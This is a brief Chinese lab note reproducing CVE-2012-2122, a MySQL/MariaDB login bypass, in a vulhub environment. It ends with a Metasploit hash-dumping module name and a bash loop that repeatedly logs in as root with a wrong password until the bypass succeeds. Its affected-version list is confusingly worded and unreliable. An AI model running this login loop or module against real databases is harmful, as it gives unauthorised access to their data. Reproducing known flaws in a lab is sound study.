參考連接:
https://www.freebuf.com/vuls/3815.html
當連接MariaDB/MySQL時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是memcmp()返回一個非零值,也會使MySQL認為兩個密碼是相同的。 也就是說只要知道用戶名,不斷嘗試就能夠直接登入SQL數據庫。按照公告說法大約256次就能夠蒙對一次。而且漏洞利用工具已經出現
受影響版本:
- MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
- MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
環境搭建: vulhub https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
環境啟動后,將啟動一個Mysql服務(版本:5.5.23),監聽3306端口,通過正常的Mysql客戶端,可以直接登錄的,正確root密碼是123456。
使用msf掃描模塊
auxiliary/scanner/mysql/mysql_authbypass_hashdump
或者
for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.230.131 2>/dev/null; done